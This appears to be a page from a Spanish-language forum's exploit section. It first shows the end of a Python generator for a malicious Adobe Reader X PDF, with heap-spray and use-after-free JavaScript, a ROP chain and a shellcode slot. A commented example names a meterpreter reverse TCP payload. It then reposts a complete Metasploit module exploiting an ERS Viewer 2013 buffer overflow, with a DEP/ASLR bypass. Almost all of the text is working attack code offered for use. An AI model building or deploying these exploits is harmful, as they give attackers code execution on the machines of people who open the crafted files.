            <ui> <imageEdit/> </ui>
            <value>
               <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image>
            </value>
         </field>
      </subform>
      <event activity="initialize" name="event__initialize">
         <script contentType="application/x-javascript">
            // This script runs at the very beginning and
            // is used to prepare the memory layout
            util.message("Initialize");
            var i; var j;
            if (spray.done == 0){
               //Trigger LFH use
               var TOKEN = "\u5858\u5858\u5678\u1234";
               var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2);
  
               for (i=0; i < spray.size; i+=1)
                  spray.x[i] = TOKEN + util.pack(i) + 
                               spray.chunkx.substring(0, chunk_len) +
                               util.pack(i) + "";
  
               util.message("Initial spray done!");
               for (j=0; j < size; j++)
                  for (i=spray.size-1; i > spray.size/4; i-=10)
                     spray.x[i]=null;
  
               spray.done = 1;
               util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
            }
            // After this the form layout is rendered and the bug triggered
         </script>
      </event>
      <event activity="docReady" ref="$host" name="event__docReady">
         <script contentType="application/x-javascript">
            // This script runs once the page is ready
            util.message("DocReady");
            var i; var j;
            var found = -1;  // Index of the overlapped string
            var acro = 0;    // Base of the AcroRd32_dll
  
            // Search over all strings for the first one with the broken TOKEN
            for (i=0; i < spray.size; i+=1)
               if ((spray.x[i]!=null)  && (spray.x[i][0] != "\u5858")){
                  found = i;
                  acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16;
                  util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) );
                  break;
               }
            // Behaviour is mostly undefined if not found
            if (found == -1){
               util.message("Corrupted String NOT Found!");
               event.target.closeDoc(true);
            }
  
            // Corrupted string was found let's generates the new
            // string for overlapping the struct before freeing it
            var chunky = "";
            for (i=0; i < 7; i+=1)
               chunky += util.pack(0x41414141);
            chunky += util.pack(0x10101000); 
            while (chunky.length < spray.slide_size/2)
               chunky += util.pack(0x58585858);
  
            // Free the overlapping string
            util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")");
            for (j=0; j < 100000; j++)
               spray.x[found-1]=spray.x[found]=null;
  
            // Trigger several allocs that will fall over the structure
            for (i=0; i < 200; i+=1){
               ID = "" + i;
               spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ "";
            }
            util.message("Allocated 20 chunks-y\\n");
  
            // Heap spraying make's baby jesus cry!
            // Construct the 0x1000 small chunk for spraying
            var obj = 0x10101000;
            var pointer_slide = "";
            pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret
            for (i=0; i < 27; i+=1)
               pointer_slide += util.pack(0x41414141);
            obj += pointer_slide.length*2;
            // ROP
            pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret
            pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule
            pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress
            pointer_slide += util.pack(obj+0xDC);                 //@0x08 point to KERNEL32
            //@0x10
            pointer_slide += util.pack(obj+0xCC);
            pointer_slide += util.pack(0x43434343);               // POPPED TO EBP
            pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX
            pointer_slide += util.pack(obj);                      //Points to offset 0 of this
            //@0x20
            pointer_slide += util.pack(obj+0x38);
            pointer_slide += util.pack(obj+0x38);
            pointer_slide += util.pack(0x1000);       //SIZE_T dwSize,
            pointer_slide += util.pack(0x40);         // DWORD flNewProtect,
            //0x30
            pointer_slide += util.pack(obj+0x34);     //PDWORD lpflOldProtect
            pointer_slide += util.pack(0x00000000);   //DWORD OldProtect
            pointer_slide += util.packhs("E9B1000000909090");
            //0x40
            pointer_slide += util.pack(acro);         //Used by next stage
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            //0x50
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            //0x60
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.pack(0xCCCCCCCC);
            //0x70
            pointer_slide += util.pack(acro);
            pointer_slide += util.pack(0x48484848);
            pointer_slide += util.pack(0x49494949);
            pointer_slide += util.pack(0x49494949);
  
            //0x80
            pointer_slide += util.pack(0x49494949);
            pointer_slide += util.pack(0x50505050);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            //0x90
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            //0xa0
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            //0xb0
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            //0xc0
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0x46464646);
            pointer_slide += util.pack(0xCCCCCCCC);
            pointer_slide += util.packs("VirtualProtect"); //@0xCC
            pointer_slide += "\u0000";
            pointer_slide += "KERNEL32";
            pointer_slide += "\u0000";
            pointer_slide += "%%SHELLCODE%%";
            while (pointer_slide.length < 0x1000/2)
               pointer_slide += util.pack(0x41414141);
            pointer_slide = pointer_slide.substring(0,0x1000/2);
            util.message("Pointer slide size: " + pointer_slide.length);
  
            // And now ensure it gets bigger than 0x100000 bytes
            while (pointer_slide.length < 0x100000/2)
               pointer_slide += pointer_slide;
            // And the actual spray
            for (i=0; i < 100; i+=1)
               spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + "";
  
            // Everything done here close the doc and
            // trigger the use of the vtable
            util.message("Now what?");
            var pdfDoc = event.target;
            pdfDoc.closeDoc(true);
  
            </script>
      </event>
   </subform>
   <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
   <?templateDesigner DefaultLanguage JavaScript?>
   <?templateDesigner DefaultRunAt client?>
   <?acrobat JavaScript strictScoping?>
   <?PDFPrintOptions embedViewerPrefs 0?>
   <?PDFPrintOptions embedPrintOnFormOpen 0?>
   <?PDFPrintOptions scalingPrefs 0?>
   <?PDFPrintOptions enforceScalingPrefs 0?>
   <?PDFPrintOptions paperSource 0?>
   <?PDFPrintOptions duplexMode 0?>
   <?templateDesigner DefaultPreviewType interactive?>
   <?templateDesigner DefaultPreviewPagination simplex?>
   <?templateDesigner XDPPreviewFormat 19?>
   <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
   <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
   <?templateDesigner Zoom 119?>
   <?templateDesigner FormTargetVersion 30?>
   <?templateDesigner SaveTaggedPDF 1?>
   <?templateDesigner SavePDFWithEmbeddedFonts 1?>
   <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
<config xmlns="http://www.xfa.org/schema/xci/3.0/">
   <agent name="designer">
      <!--  [0..n]  -->
      <destination>pdf</destination>
      <pdf>
         <!--  [0..n]  -->
         <fontInfo/>
      </pdf>
   </agent>
   <present>
      <!--  [0..n]  -->
      <pdf>
         <!--  [0..n]  -->
         <version>1.7</version>
         <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
         <packets>*</packets>
      </xdp>
   </present>
</config>
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
   <locale name="en_US" desc="English (United States)">
      <calendarSymbols name="gregorian">
         <monthNames>
            <month>January</month>
            <month>February</month>
            <month>March</month>
            <month>April</month>
            <month>May</month>
            <month>June</month>
            <month>July</month>
            <month>August</month>
            <month>September</month>
            <month>October</month>
            <month>November</month>
            <month>December</month>
         </monthNames>
         <monthNames abbr="1">
            <month>Jan</month>
            <month>Feb</month>
            <month>Mar</month>
            <month>Apr</month>
            <month>May</month>
            <month>Jun</month>
            <month>Jul</month>
            <month>Aug</month>
            <month>Sep</month>
            <month>Oct</month>
            <month>Nov</month>
            <month>Dec</month>
         </monthNames>
         <dayNames>
            <day>Sunday</day>
            <day>Monday</day>
            <day>Tuesday</day>
            <day>Wednesday</day>
            <day>Thursday</day>
            <day>Friday</day>
            <day>Saturday</day>
         </dayNames>
         <dayNames abbr="1">
            <day>Sun</day>
            <day>Mon</day>
            <day>Tue</day>
            <day>Wed</day>
            <day>Thu</day>
            <day>Fri</day>
            <day>Sat</day>
         </dayNames>
         <meridiemNames>
            <meridiem>AM</meridiem>
            <meridiem>PM</meridiem>
         </meridiemNames>
         <eraNames>
            <era>BC</era>
            <era>AD</era>
         </eraNames>
      </calendarSymbols>
      <datePatterns>
         <datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
         <datePattern name="long">MMMM D, YYYY</datePattern>
         <datePattern name="med">MMM D, YYYY</datePattern>
         <datePattern name="short">M/D/YY</datePattern>
      </datePatterns>
      <timePatterns>
         <timePattern name="full">h:MM:SS A Z</timePattern>
         <timePattern name="long">h:MM:SS A Z</timePattern>
         <timePattern name="med">h:MM:SS A</timePattern>
         <timePattern name="short">h:MM A</timePattern>
      </timePatterns>
      <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
      <numberPatterns>
         <numberPattern name="numeric">z,zz9.zzz</numberPattern>
         <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
         <numberPattern name="percent">z,zz9%</numberPattern>
      </numberPatterns>
      <numberSymbols>
         <numberSymbol name="decimal">.</numberSymbol>
         <numberSymbol name="grouping">,</numberSymbol>
         <numberSymbol name="percent">%</numberSymbol>
         <numberSymbol name="minus">-</numberSymbol>
         <numberSymbol name="zero">0</numberSymbol>
      </numberSymbols>
      <currencySymbols>
         <currencySymbol name="symbol">$</currencySymbol>
         <currencySymbol name="isoname">USD</currencySymbol>
         <currencySymbol name="decimal">.</currencySymbol>
      </currencySymbols>
      <typefaces>
         <typeface name="Myriad Pro"/>
         <typeface name="Minion Pro"/>
         <typeface name="Courier Std"/>
         <typeface name="Adobe Pi Std"/>
         <typeface name="Adobe Hebrew"/>
         <typeface name="Adobe Arabic"/>
         <typeface name="Adobe Thai"/>
         <typeface name="Kozuka Gothic Pro-VI M"/>
         <typeface name="Kozuka Mincho Pro-VI R"/>
         <typeface name="Adobe Ming Std L"/>
         <typeface name="Adobe Song Std L"/>
         <typeface name="Adobe Myungjo Std M"/>
      </typefaces>
   </locale>
   <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
   <xfa:data xfa:dataNode="dataGroup"/>
</xfa:datasets>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
         <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate>
         <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool>
         <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate>
         <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate>
      </rdf:Description>
      <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
         <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer>
      </rdf:Description>
      <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about="">
         <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID>
         <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID>
      </rdf:Description>
      <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about="">
         <dc:format>application/pdf</dc:format>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
   <annots/>
</xfdf></xdp:xdp>
    '''
    assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry"
  
    #shellcode
    xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode))
    xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE);
    xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE))
    xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64'))
    #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64'))
  
    file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp)
    #The document
    doc = PDFDoc()
      
    #font
    font = PDFDict()
    font.add("Name", PDFName("F1"))
    font.add("Subtype", PDFName("Type1"))
    font.add("BaseFont", PDFName("Helvetica"))
  
    #name:font map
    fontname = PDFDict()
    fontname.add("F1",font)
  
    #resources
    resources = PDFDict()
    resources.add("Font",fontname)
      
    #contents
    contentsDict = PDFDict()
    contents=  PDFStream(contentsDict, '''BT
    /F1 24 Tf
    100 100 Td
    (Pedefe Pedefeito Pedefeon!) Tj
    ET''')
      
    #page
    page = PDFDict()
    page.add("Type",PDFName("Page"))
    page.add("Resources",resources)
    page.add("Contents", PDFRef(contents))
  
    #pages
    pages = PDFDict()
    pages.add("Type", PDFName("Pages"))
    pages.add("Kids", PDFArray([PDFRef(page)]))
    pages.add("Count", PDFNum(1))
  
    #add parent reference in page
    page.add("Parent",PDFRef(pages))
  
    xfa = PDFStream(PDFDict(), xdp)
    xfa.appendFilter(FlateDecode())
    doc.add(xfa)
  
    #form
    form = PDFDict()
    form.add("XFA", PDFRef(xfa))
    doc.add(form)
  
    #shellcode2
    shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10)
    doc.add(shellcode2)
  
    #catalog
    catalog = PDFDict()
    catalog.add("Type", PDFName("Catalog"))
    catalog.add("Pages", PDFRef(pages))
    catalog.add("NeedsRendering", "true")
    catalog.add("AcroForm", PDFRef(form))
  
  
    adbe = PDFDict()
    adbe.add("BaseVersion","/1.7")
    adbe.add("ExtensionLevel",PDFNum(3))
  
    extensions = PDFDict()
    extensions.add("ADBE", adbe)
  
    catalog.add("Extensions",extensions)
    doc.add([catalog,pages,page,contents])
    doc.setRoot(catalog)
  
  
    #render it
    return doc.__str__()
  
  
if __name__ == '__main__':
    import optparse,os
    from subprocess import Popen, PIPE
    parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit')
    parser.add_option('--debug', action='store_true', default=False, help='For debugging')
    parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'")
    parser.add_option('--payload', metavar='PAYLOAD', default=None)
    parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation')
    (options, args) = parser.parse_args()
   
    if options.doc:
        print __doc__
        os.exit(-1)
  
    if options.debug:
        print mkXFAPDF(),
        os.exit(-1)
    if options.payload == None:
        #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R"
        msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE)
        shellcode = msfpayload.communicate()[0]
    else:
        shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex')
    print mkXFAPDF(shellcode),

#100

Bugs y Exploits / ERS Viewer 2013 ERS File Handling Buffer Overflow

Julio 09, 2013, 05:47:36 PM

===========================================
Date add:   2013-07-09
Category:   local exploits
Verified:   VerifiedVerified
Risk:   <font color="#FFBF00">Security Risk High</font>
Platform:   windows
===========================================

Código: ruby

require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
        The vulnerability exists in the module ermapper_u.dll, where the function
        rf_report_error handles user provided data in a insecure way. It results in
        arbitrary code execution under the context of the user viewing a specially crafted
        .ers file. This module has been tested successfully with ERS Viewer 2013 (versions
        13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Fitts', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3482' ],
          [ 'OSVDB', '93650' ],
          [ 'URL', 'http://secunia.com/advisories/53620/' ]
        ],
      'Payload'        =>
        {
          'Space'    => 4000,
          'DisableNops' => true,
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on Windows XP SP3
          [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
            {
              'Offset' => 191,
              'Ret' => 0x100329E9 # jmp eax # from ermapper_u.dll
            }
          ],
          # Tested on Windows XP SP3 and Windows 7 SP1
          [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
            {
              'Offset' => 191,
              'Ret' => 0x100E1152,     # xchg eax, esp # ret # from ermapper_u.dll
              'RetNull' => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
              'VirtualAllocPtr' => 0x1010c0f4
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 23 2013",
      'DefaultTarget'  => 1))
  
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ers']),
      ], self.class)
  
  end
  
  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x10082624,    # POP EAX # RETN [ermapper_u.dll]
        0x1010c0f4,    # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
        0x1001a9c0,    # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
        0x1005db36,    # XCHG EAX,ESI # RETN [ermapper_u.dll]
        0x10105d87,    # POP EBX # RETN [ermapper_u.dll]
        0xffffffff,    #
        0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
        0x30d059d9,    # INC EBX # RETN [ethrlib.dll]
        0x100e9dd9,    # POP EAX # RETN [ermapper_u.dll]
        0xa2dbcf75,    # put delta into eax (-> put 0x00001000 into edx)
        0x1001aa04,    # ADD EAX,5D24408B # RETN [ermapper_u.dll]
        0x10016a98,    # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
        0x10086d21,    # RETN (ROP NOP) [ermapper_u.dll]
        0x1001a148,    # & push esp # ret  [ermapper_u.dll]
        0x10082624,    # POP EAX # RETN [ermapper_u.dll]
        0xffffffc0,    # Value to negate, will become 0x00000040
        0x100f687d,    # NEG EAX # RETN [ermapper_u.dll]
        0x1001e720,    # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
        0x100288b5,    # POP EAX # RETN [ermapper_u.dll]
        0x90909090,    # nop
        0x100e69e0,    # PUSHAD # RETN [ermapper_u.dll]
      ].flatten.pack("V*")
  
    return rop_gadgets
  end
  
  # Restore the stack pointer in order to execute the final payload successfully
  def fix_stack
    pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18] # get teb
    pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
    pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
    return pivot
  end
  
  # In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
  # the payload on memory we can't jump there directly, but allocate executable memory
  # and jump there. Badchars: "\x0a\x0d\x00"
  def hunter_suffix(payload_length)
    # push flProtect (0x40)
    suffix = "\xB8\xC0\xFF\xFF\xFF"                              # mov eax, 0xffffffc0
    suffix << "\xF7\xD8"                                         # neg eax
    suffix << "\x50"                                             # push eax
    # push flAllocationType (0x3000)
    suffix << "\x66\x05\xC0\x2F"                                 # add ax, 0x2fc0
    suffix << "\x50"                                             # push eax
    # push dwSize (0x1000)
    suffix << "\x66\x2D\xFF\x1F"                                 # sub ax, 0x1fff
    suffix << "\x48"                                             # dec eax
    suffix << "\x50"                                             # push eax
    # push lpAddress
    suffix << "\xB8\x0C\x0C\x0C\x0C"                             # mov eax, 0x0c0c0c0c
    suffix << "\x50" # push eax
    # Call VirtualAlloc
    suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
    # Copy payload (edi) to Allocated memory (eax)
    suffix << "\x89\xFE"                                         # mov esi, edi
    suffix << "\x89\xC7"                                         # mov edi, eax
    suffix << "\x31\xC9"                                         # xor ecx, ecx
    suffix << "\x66\x81\xC1" + [payload_length].pack("v")        # add cx, payload_length
    suffix << "\xF3\xA4"                                         # rep movsb
    # Jmp to the final payload (eax)
    suffix << "\xFF\xE0"                                         # jmp eax
  
    return suffix
  end
  
  def exploit
  
    #These badchars do not apply to the final payload
    badchars = [0x0c, 0x0d, 0x0a].pack("C*")
  
    eggoptions =
      {
        :checksum => true,
        :eggtag => 'w00t'
      }
    my_payload = fix_stack + payload.encoded
  
    if target.name =~ /DEP & ASLR bypass/
      # The payload length can't include NULL's in order to
      # build the stub which will copy the final payload to
      # executable memory
      while [my_payload.length].pack("v").include?("\x00")
        my_payload << rand_text(1)
      end
    end
  
    hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)
  
    if target.name =~ /DEP & ASLR bypass/
      hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
    end
  
    if target.name =~ /NO DEP/
      buf = rand_text_alpha(1)
      buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
      buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
      buf << hunter
      buf << rand_text_alpha(target['Offset'] - buf.length)
      buf << [target.ret].pack("V") # jmp eax
      buf << rand_text_alpha(8)
      buf << egg
    elsif target.name =~ /DEP & ASLR bypass/
      buf = rand_text_alpha(1)
      buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
      buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
      buf << create_rop_chain
      buf << hunter
      buf << rand_text_alpha(target['Offset'] - buf.length)
      buf << [target.ret].pack("V") # xchg eax, esp # ret
      buf << rand_text_alpha(8)
      buf << egg
    end
  
    ers = %Q|
DatasetHeader Begin
#{buf} End
    |
  
    file_create(ers)
  end
end

Páginas 1 ... 3 4 5 6 7